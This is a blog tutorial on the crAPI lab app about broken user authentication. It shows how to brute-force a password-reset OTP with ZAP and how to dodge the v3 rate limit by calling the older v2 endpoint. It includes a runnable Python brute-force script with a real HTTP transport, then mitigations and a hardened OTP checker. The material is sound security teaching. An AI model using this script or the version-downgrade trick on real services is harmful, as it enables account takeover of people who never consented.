crAPI: Broken User Authentication
We introduced crAPI in an earlier post. We will now use it to work through several API vulnerabilities, starting with API2:2019 Broken User Authentication.
Broken authentication covers several API weaknesses that let an attacker impersonate legitimate users. They usually arise when the API provider omits an authentication mechanism or implements one incorrectly, and the underlying problems fall into two broad categories: poor session management and poor token management. The attacker's goal is to take over a user's account and obtain the same access as the victim.
An API is vulnerable when it:
- Permits credential stuffing, where the attacker replays lists of stolen usernames and passwords
- Uses weak encryption keys
- Allows login credentials to be brute-forced, with no rate limit, lockout or captcha
- Sends sensitive information such as credentials or tokens in a GET request, where it ends up in URLs, logs and browser history
- Does not validate the authenticity of tokens
- Allows weak passwords
1. Navigate to the application's "forgot password" page.
2. Enter the victim's email address and click "Send OTP."
3. Try to change the password using an invalid OTP.
4. Capture the change-password request with the ZAP Proxy tool; this is the request we will fuzz.
5. Mark the OTP value as the fuzz position and use the range 0000-9999 as the payload.
6. The fuzz run fails to find the OTP because the application rate-limits the endpoint. Note the 503 status code and the response body.
7. Downgrade the API version in the request path from v3 to v2 and resend the request. The server accepts it, so the rate limit on v3 does not apply to the older version.
8. Fuzz the v2 OTP verification endpoint with the same payload. This time the correct OTP is found and the password change succeeds.
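The whole procedure above, modelled as one script. This is an added example for this post, not crAPI's code or the original walkthrough's tooling. The endpoint paths are assumed from crAPI's own API (`/identity/api/auth/v3/check-otp`, with the legacy `v2` path alongside it), the failure threshold is an assumption, and `FakeCrapi` is a constructed stand-in for the identity service so the script runs offline; `http_send` is the drop-in transport for a lab instance you are authorised to test.

```python
"""Model of the OTP brute force with an API version downgrade.

Added example for this post; not crAPI's code or the original author's
script. Endpoint paths are assumed from crAPI's API, FakeCrapi is a
constructed stand-in for the identity service, and RATE_LIMIT is assumed.
"""
import itertools
import json
import urllib.error
import urllib.request
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterator, Optional, Tuple

RATE_LIMIT = 10  # assumed: v3 stops answering after this many failures per email


@dataclass
class FakeCrapi:
    """Constructed stand-in: v3 keeps a per-email failure counter, v2 runs the
    same check with the counter ignored, which is the weakness exploited above."""
    otp: str
    failures: Dict[str, int] = field(default_factory=dict)

    def send(self, path: str, body: dict) -> Tuple[int, dict]:
        email, otp = body["email"], body["otp"]
        if path.endswith("/v3/check-otp"):
            if self.failures.get(email, 0) >= RATE_LIMIT:
                return 503, {"message": "ERROR: too many attempts"}
        elif not path.endswith("/v2/check-otp"):
            return 404, {"message": "not found"}
        if otp == self.otp:
            return 200, {"message": "OTP verified, password changed"}
        self.failures[email] = self.failures.get(email, 0) + 1
        return 500, {"message": "ERROR: Invalid OTP! Please try again.."}


def otp_candidates() -> Iterator[str]:
    """The 0000-9999 payload range used in the ZAP fuzzer step."""
    return (f"{n:04d}" for n in range(10000))


def brute_force_otp(send: Callable[[str, dict], Tuple[int, dict]], email: str,
                    new_password: str, versions=("v3", "v2")) -> Tuple[Optional[str], Optional[str]]:
    """Try every OTP against the check-otp endpoint.

    On a 503 rate-limit response the loop keeps its place in the candidate
    list and continues on the next, older API version. Returns (otp, version)
    on success or (None, None) if no version yields the code.
    """
    candidates = otp_candidates()
    for version in versions:
        path = f"/identity/api/auth/{version}/check-otp"
        for otp in candidates:
            status, _body = send(path, {"email": email, "otp": otp, "password": new_password})
            if status == 200:
                return otp, version
            if status == 503:
                # Rate limited: retry this same OTP on the next version.
                candidates = itertools.chain([otp], candidates)
                break
        else:
            return None, None  # every candidate rejected on a non-limited version
    return None, None


def http_send(base_url: str) -> Callable[[str, dict], Tuple[int, dict]]:
    """Real transport for a lab instance (base_url assumed, e.g. http://localhost:8888)."""
    def send(path: str, body: dict) -> Tuple[int, dict]:
        req = urllib.request.Request(base_url + path, data=json.dumps(body).encode(),
                                     headers={"Content-Type": "application/json"}, method="POST")
        try:
            with urllib.request.urlopen(req) as resp:
                return resp.status, _json_or_empty(resp.read())
        except urllib.error.HTTPError as err:
            return err.code, _json_or_empty(err.read())
    return send


def _json_or_empty(raw: bytes) -> dict:
    try:
        return json.loads(raw) if raw else {}
    except ValueError:
        return {"raw": raw.decode(errors="replace")}


if __name__ == "__main__":
    server = FakeCrapi(otp="4321")
    print(brute_force_otp(server.send, "victim@example.com", "N3wPassw0rd!"))  # ('4321', 'v2')
```

The point the fake server makes explicit is that the counter and the check live together in v3, while v2 reaches the same check without the counter. That is why the attacker never needs to wait out the limit: the first 503 is simply the signal to change the path.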
Thus an attacker who knows only the victim's email address can take control of the account, impersonate the victim and read the personal information stored on the site.
- Do not re-implement authentication, token generation or password storage yourself. Use established standards and libraries.
- Implement multi-factor authentication.
- Implement an account lockout or captcha mechanism after three failed attempts to stop brute-force attacks, and apply it uniformly to every version of the endpoint; the walkthrough above bypassed the v3 limit simply by calling v2.
- Enforce a strong password or passphrase policy.
- Return the same error message for all failed responses so that user accounts cannot be enumerated.
- Follow the OWASP Authentication Cheat Sheet.
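A password-reset OTP check that applies the mitigations above, written as an added example (not crAPI's code): standard library primitives for generating and comparing the code, a per-account lockout after three failures that is keyed on the account rather than on the request path, so every API version shares it, and one generic error message for every failure. Thresholds, the OTP length and the class names are assumptions.

```python
"""Hardened OTP verification for a password reset.

Added example, not crAPI's code. MAX_ATTEMPTS, OTP_TTL_SECONDS,
LOCKOUT_SECONDS and the 6-digit code length are assumed values.
"""
import hmac
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple

MAX_ATTEMPTS = 3          # lockout threshold from the mitigation list
OTP_TTL_SECONDS = 300     # a code is only valid for a short window
LOCKOUT_SECONDS = 900     # no new code for the account while locked
GENERIC_ERROR = "Invalid or expired code"  # identical for every failure


@dataclass
class PendingReset:
    otp: str
    issued_at: float
    failures: int = 0


@dataclass
class ResetService:
    pending: Dict[str, PendingReset] = field(default_factory=dict)  # email -> code state
    locked_until: Dict[str, float] = field(default_factory=dict)    # email -> unix time
    clock: Callable[[], float] = time.time

    def issue_otp(self, email: str) -> Optional[str]:
        """Generate a code with a CSPRNG. Returns None while the account is locked;
        the caller delivers the code out of band and never echoes it in a response."""
        if self.clock() < self.locked_until.get(email, 0.0):
            return None
        otp = f"{secrets.randbelow(10**6):06d}"
        self.pending[email] = PendingReset(otp=otp, issued_at=self.clock())
        return otp

    def check_otp(self, email: str, otp: str, version: str = "v3") -> Tuple[bool, str]:
        """Verify a code. `version` is accepted only to show it plays no part in
        the decision: lockout state is per account, not per endpoint version."""
        now = self.clock()
        state = self.pending.get(email)
        if state is None or now - state.issued_at > OTP_TTL_SECONDS:
            self.pending.pop(email, None)
            return False, GENERIC_ERROR      # unknown account and expired code look the same
        if hmac.compare_digest(state.otp.encode(), otp.encode()):
            del self.pending[email]          # single use
            return True, "OK"
        state.failures += 1
        if state.failures >= MAX_ATTEMPTS:
            del self.pending[email]          # the code itself is burned
            self.locked_until[email] = now + LOCKOUT_SECONDS
        return False, GENERIC_ERROR
```

Because the lockout invalidates the code rather than merely pausing the endpoint, an attacker gets at most three guesses per issued code, regardless of which path the request arrives on. The trade-off, as with any per-account lockout, is that someone who knows a victim's email can lock that victim out of resetting for LOCKOUT_SECONDS; the captcha alternative in the list above avoids that at the cost of weaker brute-force protection.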
In the next post we will look at Broken Function Level Authorization issues in crAPI.